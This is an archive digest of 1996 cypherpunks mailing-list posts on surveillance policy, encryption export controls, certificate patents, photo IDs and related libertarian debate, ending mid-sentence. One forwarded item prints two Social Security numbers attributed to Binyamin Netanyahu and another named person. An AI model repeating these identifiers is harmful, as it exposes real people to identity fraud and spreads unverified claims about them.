Date: Fri, 2 Aug 1996 04:41:58 +0800
To: cypherpunks@toad.com
Subject: Internal Passports
Message-ID: <ae26305c070210048f37@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:30 AM 8/1/96, Lucky Green wrote:
>At 11:12 7/31/96, Duncan Frissell wrote:

>>Most Central European countries have both privacy commissioners and legal
>>requirements that everyone register their addresses with the police.  I'll
>>do without the former if I can also avoid the latter.
>
>I remember a time when Privacy Commissioners were a new thing. Their
>primary purpose seemed to be to sanction government access to (and keeping
>of) large databases on the activities of the population. Their secondary
>purpose was to prevent the private sector competition from doing the same.
>Eliminating access to such data by the individual in the process.

I'm with Duncan and Lucky on this one. Nations with a "Privacy Ombudsman"
are almost always nations with extensive files on individuals, their
habits, and their political activities.

Having a "Privacy Ombudsman" is a bone thrown to the proles. I suspect a
police state like Singapore has such a person.

And related to the "photo I.D." discussion, most of these nations demand
that passports be left at hotel desks when checking in. (At least they did
when I spent 6 weeks travelling through Europe in 1983.) Perhaps the theory
is that this stops people from running out on their bills, though credit
cards do the same thing (*). However, the police reportedly inspect these
passports and enter them into data bases to track movements.

(* As the credit card companies increase their cooperation with law
enforcement, a la the links between FinCEN and the Big Three credit
reporters,  the passports will no longer be necessary, and the process of
tracking movements can be done just with the credit cards. Those without
credit cards...well, they'll think of something.)

Question (a la "Wired"): "When will the United States introduce an internal
passport?"

May: "2005, but they won't call it that."


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: editor@cdt.org (Bob Palacios)
Date: Fri, 2 Aug 1996 02:29:46 +0800
To: cypherpunks@toad.com
Subject: CDT Policy Post 2.29 - Administration, Congress Propose Sweeping Anti-TerrorismInitiatives
Message-ID: <v02140b07ae26690e102b@[204.157.127.16]>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
    _____ _____ _______
   / ____|  __ \__   __|   ____        ___               ____             __
  | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
  | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
  | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
   \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
   The Center for Democracy and Technology  /____/     Volume 2, Number 29
----------------------------------------------------------------------------
      A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 29                        August 1, 1996

 CONTENTS: (1) Clinton Administration, Congress Propose Sweeping
               Anti-Terrorism Initiatives
           (2) How to Subscribe/Unsubscribe
           (3) About CDT, contacting us

  ** This document may be redistributed freely with this banner intact **
        Excerpts may be re-posted with permission of <editor@cdt.org>
         ** This document looks best when viewed in COURIER font **
-----------------------------------------------------------------------------

(1) CLINTON ADMINISTRATION, CONGRESS PROPOSE SWEEPING ANTI-TERRORISM
    INITIATIVES

In the wake of the recent bombing at the Olympics and the suspected
terrorist involvement in the TWA crash, the Clinton Administration and
members of Congress are proposing a set of sweeping counter-terrorism
initiatives. If enacted into law, these proposals will dramatically
increase law enforcement surveillance authority over the Internet and other
advanced communications technologies. An outline of the Administration's
proposal was circulated on Capitol Hill on Monday July 29.

President Clinton has urged Congress to pass new counter-terrorism
legislation before the Congressional recess at the end of this week.  While
several prominent Republican members of Congress, including House Speaker
Newt Gingrich (R-GA), have said publicly that Congress should not rush into
any new counter-terrorism legislation, most observers believe there is a
strong possibility that some or all of the Administration's proposal will
be enacted before the August recess.

The draft proposal contains several measures which were rejected by
Congress as part of the previous counter-terrorism initiative proposed
last year after the Oklahoma City bombing, as well as several new measures
including as-yet unspecified changes to U.S. encryption policy and funding
for the Communications Assistance for Law Enforcement Act (CALEA, a.k.a.
Digital Telephony).

CDT is concerned that the latest counter-terrorism efforts on Capitol Hill
are occurring without appropriate deliberation.  Major policy decisions
expanding the surveillance powers of law enforcement should not be made
without careful consideration of the necessity of such proposals and the
relative benefit to society. In the coming days and weeks, CDT will work
with Congressional leaders, privacy advocates, and the net.community to
ensure that constitutional civil liberties and the openness of the Internet
are protected as Congress considers counter-terrorism measures.
________________________________________________________________________

MAJOR POINTS OF THE COUNTER-TERRORISM PROPOSALS CIRCULATING ON THE HILL

The administration's new counter-terrorism initiative and other amendments
circulating this week in Congress contain numerous provisions, but four
are of particular concern to the net.community:

* New Threats to Encryption, Opposition to the Pro-CODE Bill
* Funding for Digital Telephony Without Public Accountability
* Amendment to Criminalize 'Bomb-Making' Information on the Internet
* Expanded Authority for Multi-Point, "Roving" Wiretaps

The full text of the Administration's proposal and background information
are available at CDT's counter-terrorism Web Page:

    http://www.cdt.org/policy/terrorism/

       --------------------------------------------------------

I. NEW THREATS TO ENCRYPTION, OPPOSITION TO THE PRO-CODE BILL

The Administration's outline contains the following statement on encryption:

 "* Encryption -- We will seek legislation to strengthen our ability to
    prevent terrorists from coming into the possession of the technology
    to encrypt their communications and data so that they are beyond the
    reach of law enforcement.  We oppose legislation that would eliminate
    current export barriers and encouraging the proliferation of encryption
    which blocks appropriate access to protect public safety and the
    national security."

While no specific legislative language has yet been proposed, this
represents the first statement by the Administration that they will seek
legislation to further restrict encryption.  Even more troubling, the
Administration is clearly attempting to use the recent suspected terrorist
incidents to push for a new and more restrictive encryption policy.

This new proposal comes as Congress is finally beginning to seriously
consider major changes in U.S. encryption policy. Bipartisan legislation
in both the House and Senate to relax encryption export controls is gaining
momentum.  The Senate Commerce Committee has held 3 hearings in the last 6
weeks, and is preparing to vote to send the Burns/Leahy "Pro-CODE" bill (S.
1726) to the floor of the Senate.  The Administration's attempt to leverage
the public's concern about terrorism to block passage of the Pro-CODE bill
is disturbing, and poses a significant threat to privacy and security on the
Internet.

CDT is working with members of Congress, privacy advocates, and the
communications and computer industries to oppose any attempt by the
Administration to impose new restrictions on encryption, and we continue to
work to move the bipartisan export relief legislation through Congress.

       --------------------------------------------------------

II. FUNDING FOR DIGITAL TELEPHONY WITHOUT PUBLIC ACCOUNTABILITY

The Administration is also seeking to override the public accountability
provisions of the Communications Assistance for Law Enforcement Act (CALEA
- a.k.a. 'Digital Telephony') by providing a funding for the law in a way
that prevents public oversight of the FBI's surveillance ability.

Enacted in October of 1994, granted law enforcement new authority to
influence the design of telecommunications networks (the Internet,
Commercial online services, and BBS's were exempted) in order to preserve
their ability to conduct court authorized electronic surveillance.

Congress balanced this new authority with a number of mechanisms to ensure
public accountability over law enforcement surveillance ability.
While complicated, the public accountability mechanisms are designed to
work as follows:

* Law enforcement provides telecommunications carriers, the Congress,
  and the public with notice of its surveillance capacity needs (i.e.,
  the number of simultaneous wiretaps in a given geographic location)
  with an opportunity for public comment.

* Based on an assessment of the reasonableness of the law enforcement
  surveillance capacity request, Congress appropriates money to cover
  the cost of modifications.  If Congress does not believe law
  enforcement has adequately justified its request, money will not be
  appropriated.

* Telecommunications carriers are not obligated to comply with the
  statute or make any capacity modifications without government
  reimbursement.

In October 1995, the FBI published its first notice of surveillance
capacity (see CDT Policy Post Vol. 1, No. 26).  The telecommunications
industry and privacy advocates used the public accountability provisions of
CALEA to respond to the FBI's request and argued that the FBI had not
adequately justified the extensive surveillance capability contained in the
request.  As a result, Congress has not yet appropriated funds and no
modifications have been made.

The FBI clearly believes that the public accountability provisions of CALEA
are working **too well**, and appears to be using the recent focus on
terrorism to push for a new funding mechanism which does not contain public
oversight.

CDT is fighting hard to ensure that the public accountability provisions of
CALEA, which have until now prevented the FBI from acquiring unnecessary
surveillance capacity, remain a part of the law, and will vigorously oppose
any effort by the FBI and the Clinton Administration to remove the last
opportunity for public oversight over law enforcement power.

       --------------------------------------------------------

III. THE AVAILABILITY OF 'BOMB-MAKING' INFORMATION ON THE INTERNET

Senator Dianne Feinstein (D-CA) has reintroduced an amendment to make it
illegal to disseminate information on how to construct explosives knowing
that the information will be used in furtherance of a federal crime.  The
amendment was adopted by the Senate earlier this month as part of a
Department of Defense Appropriations bill.  CDT believes that the vague
provisions of the Feinstein amendment could have a chilling effect on online
speech, needlessly duplicate existing criminal statutes, and should be
removed.

Feinstein first proposed the amendment as part of the 1995
counter-terrorism bill. The initial Feinstein amendment was extremely broad
and would have resulted in a flat ban on certain constitutionally protected
speech online.  After civil liberties advocates objected, Feinstein
narrowed her amendment substantially, although it was ultimately dropped
from the final terrorism bill signed in April 1996.

       --------------------------------------------------------

IV.  EXPANDED WIRETAP AUTHORITY

The Administration's proposal would also significantly expand current
wiretapping authority to allow multi-point (or "roving") wiretaps. This
would dramatically change surveillance authority to include wiretaps of
INDIVIDUALS instead of LOCATIONS.

This proposal would do away with the delicate balance between privacy and
law enforcement that Congress has struck over 30 years of wiretapping
legislation. Federal law has always required that wiretaps issue for a
specific location, to meet Fourth Amendment requirements. In 1986 Congress
introduced a narrow exception to this rule, only for cases where it could
be shown that the target was intentionally evading wiretaps by changing
facilities. The Administration proposal would completely remove this
standard, allowing so-called "roving taps" for any persons whose behavior
makes wiretapping difficult for law enforcement.

The administration proposed similar provisions in the spring of 1995 in the
wake of the Oklahoma City bombing. These provisions proved controversial in
Congress and were dropped from the final bill.

________________________________________________________________________

FOR MORE INFORMATION

For more information on the counter-terrorism proposals and their impact on
the Internet check out:

CDT's Counter-Terrorism Page:     http://www.cdt.org/policy/terrorism/
CDT's Encryption Policy Page:     http://www.cdt.org/crypto/
CDT's Digital Telephony Page:     http://www.cdt.org/digtel.html
Encryption Policy Resource Page:  http://www.crypto.com/

------------------------------------------------------------------------

(4) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
nearly 10,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------

(5) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.29                                             8/1/96
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 2 Aug 1996 05:17:20 +0800
To: cypherpunks@toad.com
Subject: Re: Cracking RC4/40 for massive wiretapps
In-Reply-To: <199608011151.HAA07754@unix.asb.com>
Message-ID: <199608011709.KAA17457@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


When I wrote my previous message about the use of lookup tables, I forgot
about the use of salt, extra key bits which vary per message and are sent
in the clear.  That defeats the table lookup approach for searching for
messages which were encrypted with a given key.  There are really 128 key
bits per message, with 40 of them kept secret.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 2 Aug 1996 02:14:33 +0800
To: cypherpunks@toad.com
Subject: Micali's rights to lightweight certificates etc.
Message-ID: <v03007827ae266b55420b@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Wed, 31 Jul 1996 17:28:56 -0400
From: Silvio Micali <silvio@sunspot.tiac.net>
To: cme@cybercash.com, d.adams@xopen.co.uk, frantz@netcom.com, hallam@w3.org,
        rodney@sabletech.com, rsalz@osf.org, silvio@sunspot.tiac.net,
        spki@c2.org
Subject: Micali's rights to lightweight certificates etc.
Sender: owner-spki@c2.org
Precedence: bulk

Dear Carl:

Last April I was forwarded by Ron (Rivest) the
following e-message addressed to you:

     "[Re: Micali's lightweight certificates with hash chains]

      The mechanism maybe patented, but who owns the patent?
      I am aware of claims by two european groups who have
      payment schemes using a combined s/key and signed cert
      technique

      Pghill"


As I do not know the context of your conversation, it is hard for me
to guess which technology's rights the  above question refers to.
There are (at least) two possible technologies the question refers to.
Let me thus answer it in either case. I would appreciate if you could
pass this information to people you feel may be interested in it.
(I am trying to CC all the people CCed in the original message,
but  I am not sure that this reaches all the right people.)


                       RIGHTS INFORMATION

My efficient certificate revocation technology is itself based on my
off-line digital signature technology.

The efficient certificate certificate revocation technology has
been invented by me alone. I have filed for patent protection,
and the patent is currently pending with the U.S. Patent Office.

The underlying off-line signature technology has been invented
by Shimon Even, Oded Goldreich and me. The technology is protected by
U.S. Patent No. 5,016,274. The rights to this technology are only with me.

(The latter technology, among other things, covers the process of separating
the signing process into two stages: a OFF-LINE one --that can be performed
before knowing what the message to be signed is--- and an ON-LINE one
--which is typically performed when one knows exactly what he/she wishes
to sign. In the preferred embodiment,  in the off-line step,
the  signer uses the secret key SK of a first, conventional secret-public key
pair (SK,PK) to digitally sign the publick key, pk, of a
second, restricted but very fast, signature  scheme. In the on-line step,
the signer uses the second secret key --i.e., the one associated with pk--
in order to sign the desired message.

In particular, the second public key, pk, can be
obtained by evaluating k times a given one-way hash function on input
sk. After doing so, one can sign in an off-line step pk together with
a certificate serial number (and other information).
Then, in an on-line step, one can sign  that a certificate is being valid
for at at least i days --where i is between 1 and k--
by releasing the ith inverse of pk; that is, by releasing a value that,
hashed i times, yields pk.
You can thus see the connection between the two technologies.)

Both technologies are available for licensing.
If you or someone in your discussion group is aware of a company
using either technology, I would appreciate if you could facilitate a
contact between me and such a company, so that we can discuss possible
licensing arrangements.

The Efficient Certificate Revocation Paper is presented in
MIT Technical MIT/LCS/TM-542, dated November 95. A better version
appears in a March 1996 manuscript. Either version could be obtained
from me, if more convenient.

Off-Line Digital Signatures also appear in the Proceedings of
Crypto 89.  A better version can be found in
The Journal of Cryptography (1996) 9; pp. 35-67.
Any version is also obtainable from me, if more convenient.

Hope this helps answering the above ``rights'' question.
Thank you also in advance for forwarding the above information
to whomever you believe may be interested in it.

All the best,

Silvio

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Date: Fri, 2 Aug 1996 05:08:07 +0800
To: cypherpunks@toad.com
Subject: Re: A Libertine Question
Message-ID: <v03007808ae26a39f39a2@[17.203.21.77]>
MIME-Version: 1.0
Content-Type: text/plain


I think Bob Dole understands the needs for privacy rights for animals..

the following verbatim account of a segment of a Bob Dole appearance a week
or so ago at a cotton cooperative in Bakersfield, California

"My wife was here six days last week, and she'll be back next week,
and she does an outstanding job. And when I'm elected, she will not be
in charge of health care. Don't worry about it. Or in charge of
anything else. (Muffled crowd gasp.) I didn't say that. It did sort of
go through my mind. But she may have a little blood bank in the White
House. But that's all right. We need it. It doesn't cost you anything.
These days, it's not all you give at the White House - your blood. You
have to give your file. I keep wondering if mine's down there. Or my
dog. I got a dog named Leader. I'm not certain they've got a file on
Leader. He's a schnauzer. I think he's been cleaned. We've had him
checked by the vet but not by the FBI or the White House. He may be
suspect, but in any event, we'll get into that later. Animal rights or
something of that kind. But this is a very serious election."


Vinnie Moscaritolo
"Law - Samoan Style"
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Fri, 2 Aug 1996 04:42:59 +0800
To: tomw@netscape.com (Tom Weinstein)
Subject: Re: Let's Say "No!" to Single, World Versions of Software
In-Reply-To: <31FFCD1E.3F54@netscape.com>
Message-ID: <199608011714.KAA08903@clotho.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> The only thing they can revoke is their permission to provide it for
> download over the internet.  They can't revoke our permission to sell
> it in stores or via snail mail.

	Where do you get this idea? Got an inside track into the minds
of the supreme court?

-- 
Sameer Parekh					Voice:   510-986-8770
Community ConneXion, Inc.			FAX:     510-986-8777
The Internet Privacy Provider
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 2 Aug 1996 05:28:22 +0800
To: cypherpunks@toad.com
Subject: Blurring the Chains of Causation
Message-ID: <ae2633210802100435c1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



An unusual thread name, "Blurring the Chains of Causation."

What I mean is this:

- the U.S. legal system has been blurring, or confusing, the chain of
cause-and-effect in crimes

- Example: allowing suits by insurance companies and states against tobacco
companies. A smoker gets cancer by his actions, and it used to be that this
was his action, his responsibility. Now, we hold tobacco companies liable,
and perhaps will someday hold executives of these companies criminally
liable. (This for a product which is not illegal, mind you.)

(There are a bunch of related examples. "Civil liability" is a major way
this blurring is happening. Gun manufacturers being sued for crimes
committed with their guns, ladder makers sued by the families of criminals
who leaned ladders up against electrified fences, and so on. How long
before a bookstore is sued for "allowing" a book to be bought by someone
who later is "inspired" to commit a crime--actually, John Grisham ("The
Firm") is involved in a lawsuit against Oliver Stone for his film, "Natural
Born Killers," which Grisham claims "inspired" a murder. This has got to
stop, in my opinion.)

- "They made me do it" defenses. Hostess Twinkies are implicated in the
brutal murder of San Francisco's mayor and a city councilman. Childhood
abuse is exculpatory in other cases. Psychobabblers blather about what
caused people to behave as they did. A mass murderer says pornography made
him kill 25 women. A lawyer claims his client's son committed suicide after
listening to heavy metal music. And so it goes.

This blurring has links to cryptography, bomb-making instructions on the
Net, availability of porn on the Net, and many other things.

To cut to the chase:

- a librarian who "allows" a person to check out "The Anarchist Cookbook"
is *not* causing a crime, though much of the rhetoric one hears is
otherwise.

- the _author_ of that book (Powell, allegedly) is *also* not causing a crime.

- the _publishers_ of that book (Lyle Stuart, as I recall--my copy is not
handy) also have not committed any crime

To make things clear, some of the language being proposed in the
rush-to-law about anti-terrorism, wiretapping, anti-encryption, etc. As
Sen. Feinstein puts it, "We hope we can wrap up the repeal of the Bill of
Rights and have it on President Clinton's desk before the close of the
Olympics on Sunday." :-(

- if I _advocate_ strong crytography, avoidance of taxes, undermining of
government power, crypto anarchy, etc., I have not committed any crime
(Caveat: advocating the violent overthrow of the U.S. government apparently
is a crime, as are certain forms of conspiracy, a la RICO, tax evasion,
etc.)

- if I _use_ strong cryptography, I have not committed any crime, ipso
facto, nor am I necessarily conspiring to commit any crime

And so on.

Many of the proposed restrictions seek to further blur this chain of
causation, by making someone who provides access to materials which _may_
later be used in a crime, or which may "inspire" someone to crime, a kind
of criminal.

The trend picked up steam with the "deep pockets" precedents in the 70s
(*), was fed by the blame-passing psychobabble of the same decade, and has
now reached its present state by a willingness of the courts to hear such
cases.

People who actually commit real crimes are the criminals, not those who
sold them Hostess Twinkies without first checking their blood sugar level.
Not those who let a library patron look at a "dangerous" book. And not
those who provided strong cryptographic tools which _might_ be used by
terrorists, pedophiles, and money launderers.

--Tim May

(* "deep pockets" -- If there are N parties in a lawsuit, and one of them
shares only 5% of the (putative) blame but has 95% of the overall assets,
go after the party with the "deepest pockets." This forced Cessna and
Piper, the leading light aircraft firms at one time, to stop selling light
aircraft. The example with Oliver Stone being sued is a clear case of
this.)

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 2 Aug 1996 05:21:13 +0800
To: cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.29 - Administration, Congress Propose Sweeping Anti-Terrorism Initiatives
Message-ID: <199608011743.KAA03854@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:03 AM 8/1/96 -0400, Bob Palacios wrote:

>   The Center for Democracy and Technology  /____/     Volume 2, Number 29
> CDT POLICY POST Volume 2, Number 29                        August 1, 1996
>I. NEW THREATS TO ENCRYPTION, OPPOSITION TO THE PRO-CODE BILL
>The Administration's outline contains the following statement on encryption:
> "* Encryption -- We will seek legislation to strengthen our ability to
>    prevent terrorists from coming into the possession of the technology
>    to encrypt their communications and data so that they are beyond the
>    reach of law enforcement.  We oppose legislation that would eliminate
>    current export barriers and encouraging the proliferation of encryption
>    which blocks appropriate access to protect public safety and the
>    national security."
>
>While no specific legislative language has yet been proposed, this
>represents the first statement by the Administration that they will seek
>legislation to further restrict encryption.  Even more troubling, the
>Administration is clearly attempting to use the recent suspected terrorist
>incidents to push for a new and more restrictive encryption policy.

Even though it may be obvious to the crypto-savvy people in CP, since this 
press release is directed at a somewhat wider audience it would be useful to 
point out that none of these recent terrorist incidents involved encryption 
at all.  

>The Administration's attempt to leverage
>the public's concern about terrorism to block passage of the Pro-CODE bill
>is disturbing, and poses a significant threat to privacy and security on the
>Internet.

Same point.  Unless you mention that encryption wasn't a factor at all, you 
risk leaving the (unsophisticated) reader with the implication that there 
was, indeed, some crypto angle to these incidents.  Like it or not, that's 
the way public discourse seems to be done these days:  Unless a point is 
specifically challenged, implicitly it is deemed ceded to the claimant.  

Sure, Clinton did not actually claim that encryption was a factor, but it 
was there by implication, and the average citizen seeing his proposals would 
come to that conclusion.   Denying this specifically, you'd be "points 
ahead" and would be in a better position to shut down those trying to 
restrict encryption.





Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 2 Aug 1996 05:59:16 +0800
To: cypherpunks@toad.com
Subject: A funny thing happend to my data on the way to the bank
Message-ID: <199608011745.KAA19325@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------

The Prime Minister's Social Security Number
Prime Minister Binyamin Netanyahu's US Social Security Number is
172-42-6111, according to the Boston  Consulting Group in Massachusetts,
which employed Netanyahu for about one-year during 1979-80.=20

The number indicated by the marketing firm contradicts information contained
in a credit report by  the US federally-regulated Transunion Company, pulled
from company files during the first days of July.  According to that report,
Netanyahu and an American named   John J. Sullivan both used Social Security
number 020-36-4537.

Questions were raised in the reports as to whether  Netanyahu had attempted
to create a false identity or had used a number which was not his.
Publication of the credit report findings, and later  reports indicating
that Netanyahu's name had suddenly been deleted from Transunion's files,
raised additional questions about possible computer break-ins into the
company's records.

Netanyahu aides have repeatedly claimed that the prime minister does not
remember his number. In order to untangle Netanyahu from the issue, aides
three weeks ago,   asked US officials to provide his number. According to
the Prime Minister's Office, that request has yet to be answered.
(Jerusalem Post e-mail Edition..7/31.. heather@jpost.co.il).
=20







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rpowell@algorithmics.com>
Date: Fri, 2 Aug 1996 03:19:07 +0800
To: cypherpunks@toad.com
Subject: Re: "An who shall guard the guardians?"
In-Reply-To: <sNoyRD6w165w@bwalk.dm.com>
Message-ID: <96Aug1.113051edt.20490@janus.algorithmics.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> In article <sNoyRD6w165w@bwalk.dm.com>, dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) writes:

    > Duncan Frissell <frissell@panix.com> writes:
    >> At 02:46 AM 8/1/96 -0700, Timothy C. May wrote:
    >> >
    >> >The Latin maxim "And who shall guard the guardians?" has some relevance to
    >> >the headlong rush into converting the U.S. into even more of a security
    >> >state than it is now.
    >> 
    >> Quis custodiet ipsos custodes?

    > Who custodiates the custodians?

Is this not slightly better translated as "who watches the watchers?"?
This is the way I have heard it stated, and it is _WAY_ too long since
I have studied Latin.  One of my great dissapointments is that,
despite having spent my entire school career (less university: I'm
only 20) in private schools, I couldn't take latin or greek except one
year of latin, after which the course was dropped.  Sigh.

-Robin, who really wanted a classical eduation.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robin Powell <rpowell@algorithmics.com>
Date: Fri, 2 Aug 1996 03:12:47 +0800
To: cypherpunks@toad.com
Subject: Re: "adjust your attitude with their billy club"
In-Reply-To: <ae24e2ee02021004242f@[205.199.118.202]>
Message-ID: <96Aug1.115045edt.20493@janus.algorithmics.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> In article <ae24e2ee02021004242f@[205.199.118.202]>, tcmay@got.net (Timothy C. May) writes:

    > At 6:28 AM 7/31/96, Alan Horowitz wrote:
    >> I am a strong libertarian. Sell crack cocaine, rent your pussy to horny
    >> middle-aged businessmen, do any non-violent,
    >> non-damaging-to-others-property you want, but damn well maintain public
    >> order and decorum. Or I will scream to my councilman for the cops to
    >> adjust your attitude with their billy club.

Someone please, please, please tell me this guy was being facetious.
Please?  Even if it's not true?  Pretty Please???

In a libertarian society, so-called "public decorum" is dictated by
who owns the property you are sitting on.  If my building code
(i.e. the code of laws set by the person who owns the building I live
in) says I can blast my boombox, your opinion can go to hell: find
another place to live if you don't like it.  Or petition the person
who owns the place.

Burning toxic waste is intrisically damaging to other people,
blasting your boombox is not (unless it is so loud as to actually
cause ear damage to bystanders, but given the volume of music
tolerated at rock concerts, I find this highly unlikely).

-Robin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 2 Aug 1996 06:41:23 +0800
To: cypherpunks@toad.com
Subject: Re: FPGAs and Heat (Re: Paranoid Musings)
In-Reply-To: <ae262b5b050210046227@[205.199.118.202]>
Message-ID: <199608011848.LAA11828@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:

> This was a company in Bowie, Maryland, closely linked with the NSA and with
> the "supercomputer centers." The idea of "processing in memory" has been
> explored by various companies.

That's one of the things that killed Thinking Machines.  It turned out
that a standard supercomputer with PIM chips for memory could give the
same performance for less money.  The PIMs did the massively parallel
computation with the standard architecture redistributing data as needed
using high bandwidth scatter-gather operations and moves.

At the time Thinking Machines went under, Seymour Cray had a big contract
for Cray Computer to deliver a PIM Cray machine to the government, but he
missed some deadlines, got cancelled, and his company went down the tubes
as well.  Too bad, it would have been a nice box. 

BTW, I gave up trying to predict innovations after being dragged down to 
see an early version of Visi-Calc running on an Apple, and horribly 
insulting the developers with comments like "But why would anyone want 
to emulate a ledger sheet?" and "I hope you guys didn't spend a lot of
time on this."  After repeating such performances at startups like Lotus
and Infocom, I realized that predictive history was not one of my talents.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Fri, 2 Aug 1996 03:54:56 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Photo IDs (Re: A Libertine Question)
In-Reply-To: <ae24e032010210047fab@[205.199.118.202]>
Message-ID: <Pine.BSF.3.91.960801114946.8158A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


> ... 
> 
> And just what is a "true name" for the purposes of this law, anyway? Birth
> name? And what is that? What about people who marry, change names, etc.?
> Given that there is no "standard" for photo I.D.s, will my Official
> Cypherpunks Card count?
> 
> I can easily make my own photo I.D.s, or even order "fake I.D.s" from
> various mail-order outlets advertising in the Usual Places. If I show up at
> the airline with two photo I.D.s, one showing me to be "Security Officer
> Mickey Mouse" and the other showing me to be "Mickey Mouse, Internal
> Security Agency," will I be violating any laws?
> 
> --Mickey Mouse (I just changed my name--if you don't like it, FAA, fuck off)

Uh oh.  The hell with the FAA.  What about the Disney people?  Michael 
Eisner may sent Goofy to lean on you!

EBD
No longer a federal prosecutor!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 2 Aug 1996 03:59:33 +0800
To: cypherpunks@toad.com
Subject: Brain Tennis with Dorthy
Message-ID: <2.2.32.19960801155921.0085f7c0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm following the Brain Tennis Match between Dorothy Denning and John
Gilmore on encryption and the right to absolute privacy on Hot Wired
(http://www.hotwired.com/braintennis/96/31/index0a.html).

Were I a participant in this exercise, I would lob the following to Dorothy:

I have to assume that Dorothy believes in absolute privacy (in some areas).
I am assuming, for example, that she does not believe in torture as an
interrogation technique.  I assume, therefore, that she believes in absolute
privacy in the individual brain.  While she may support imprisonment (or the
threat of imprisonment) as an interrogation technique (jailing for
contempt), I think she would oppose bringing out the hot pokers.

I have a wider point to make but please indulge me for a moment.  The fact
that many wiretapping advocates oppose torture raises a host of absolutely
*fascinating* questions:

1)  If it were technically possible to compel us (without pain) to disclose
